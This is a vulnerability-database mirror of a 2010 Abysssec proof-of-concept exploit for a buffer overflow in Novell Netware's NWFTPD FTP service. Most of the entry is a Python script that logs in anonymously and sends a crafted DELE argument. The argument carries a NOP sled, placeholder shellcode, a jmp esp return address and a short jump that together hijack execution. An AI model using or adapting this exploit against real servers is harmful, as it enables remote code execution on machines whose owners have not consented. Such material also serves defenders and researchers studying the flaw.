Lucene search
K

Month Of Abysssec Undisclosed Bugs - Novell Netware

🗓️ 08 Sep 2010 00:00:00Reported by AbysssecType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

Month Of Abysssec Undisclosed Bugs - Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflo

Code
`'''  
__ __ ____ _ _ ____   
| \/ |/ __ \ /\ | | | | _ \  
| \ / | | | | / \ | | | | |_) |  
| |\/| | | | |/ /\ \| | | | _ < Day 7 - (Binary Analysis)  
| | | | |__| / ____ \ |__| | |_) |  
|_| |_|\____/_/ \_\____/|____/  
  
http://www.exploit-db.com/moaub-7-novell-netware-nwftpd-rmdrnfrdele-argument-parsing-buffer-overflow/  
'''  
  
'''  
Title : Novell Netware NWFTPD RMD/RNFR/DELE Argument Parsing Buffer overflow  
Version : NWFTPD.NLM 5.09.02 (Netware 6.5 – SP8)  
Analysis : http://www.abysssec.com  
Vendor : http://www.Novell.com  
Impact : Critical  
Contact : shahin [at] abysssec.com , info [at] abysssec.com  
Twitter : @abysssec  
'''  
from ftplib import FTP  
import sys  
  
try:  
netwareServerIp = '127.0.0.1'  
ftp = FTP(netwareServerIp)   
ftp.login('anonymous','a@a')  
buffer = "/"  
buffer += "\x90"*107 #nops  
buffer += "\xcc"*413 #shellcode part2 = 413 byte  
buffer += "\xb9\xa4\xe0\x91" #EIP - jmp esp from nwftpd.nlm module  
buffer += "\xcc"*124 #shellcode part1 = 124 byte  
buffer += "\x08\xeb\x90\x90\x90\x90" #short jmp to shellcode part2  
ftp.voidcmd('DELE ' + buffer)  
  
except Exception,err:  
print err  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation